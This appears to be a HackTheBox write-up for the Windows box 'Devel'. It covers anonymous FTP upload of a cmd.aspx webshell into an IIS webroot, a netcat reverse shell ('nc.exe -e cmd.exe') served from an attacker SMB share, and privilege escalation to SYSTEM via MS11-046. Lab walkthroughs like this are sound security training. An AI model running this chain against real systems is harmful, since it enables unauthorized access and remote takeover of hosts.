An easy Windows box from HackTheBox, using an unsecured FTP server and file upload to get initial access, then a version CVE for SYSTEM.



Regular nmap

nmap -sC -sV -oA nmap/devel

Nmap scan report for
Host is up (0.016s latency).
Not shown: 998 filtered tcp ports (no-response)
21/tcp open  ftp     Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-title: IIS7
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Try to anonymously log in to FTP, and find a few files

ftp> ls  
229 Entering Extended Passive Mode (|||49158|)  
125 Data connection already open; Transfer starting.  
03-18-17  02:06AM       <DIR>          aspnet_client  
03-17-17  05:37PM                  689 iisstart.htm  
03-17-17  05:37PM               184946 welcome.png

And find that we can also upload files and they show up on the server

touch test.html && echo test > test.html

When you navigate to the server find that it has the FTP directory as the webroot


Know that the server is using IIS7.5 which is aspx based, so can use a webshell to start, then move to a reverse shell

Find the aspx reverse shell

locate cmd.aspx


Then copy it into current directory, and upload to the FTP server to get a webshell

Now need to get nc.exe onto the server, using an smb share, a very cool trick

First, make a smb directory where the root of the share will be

mkdir smb

Then copy nc.exe into smb

cp {path to nc.exe} smb

And run

python3 /home/kali/.local/bin/ share smb

The “share” part is just the name of the share, so when you go back to the web shell you can execute nc.exe for a reverse shell like so

\\\share\nc.exe -e cmd.exe 8000

And get shell

Now can run systeminfo and copy it into a text file to run wondows exploit suggester

Host Name:                 DEVEL  
OS Name:                   Microsoft Windows 7 Enterprise    
OS Version:                6.1.7600 N/A Build 7600  
OS Manufacturer:           Microsoft Corporation  
OS Configuration:          Standalone Workstation  
OS Build Type:             Multiprocessor Free  
Registered Owner:          babis  
Registered Organization:      
Product ID:                55041-051-0948536-86302  
Original Install Date:     17/3/2017, 4:17:31 ��  
System Boot Time:          25/5/2022, 11:30:06 ��  
System Manufacturer:       VMware, Inc.  
System Model:              VMware Virtual Platform  
System Type:               X86-based PC  
Processor(s):              1 Processor(s) Installed.  
                          [01]: x64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz  
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018  
Windows Directory:         C:\Windows  
System Directory:          C:\Windows\system32  
Boot Device:               \Device\HarddiskVolume1  
System Locale:             el;Greek  
Input Locale:              en-us;English (United States)  
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul  
Total Physical Memory:     3.071 MB  
Available Physical Memory: 2.472 MB  
Virtual Memory: Max Size:  6.141 MB  
Virtual Memory: Available: 5.548 MB  
Virtual Memory: In Use:    593 MB  
Page File Location(s):     C:\pagefile.sys  
Domain:                    HTB  
Logon Server:              N/A  
Hotfix(s):                 N/A  
Network Card(s):           1 NIC(s) Installed.  
                          [01]: vmxnet3 Ethernet Adapter  
                                Connection Name: Local Area Connection 3  
                                DHCP Enabled:    No  
                                IP address(es)  
                                [02]: fe80::58c0:f1cf:abc6:bb9e  
                                [03]: dead:beef::4428:f438:fd2a:79a1  
                                [04]: dead:beef::58c0:f1cf:abc6:bb9e

Running windows exploit suggester, see that it is vulnerable to MS11-046, importantly - a reverse shell friendly exploit

Copy it to the smb server and execute it, getting system

nt authority\system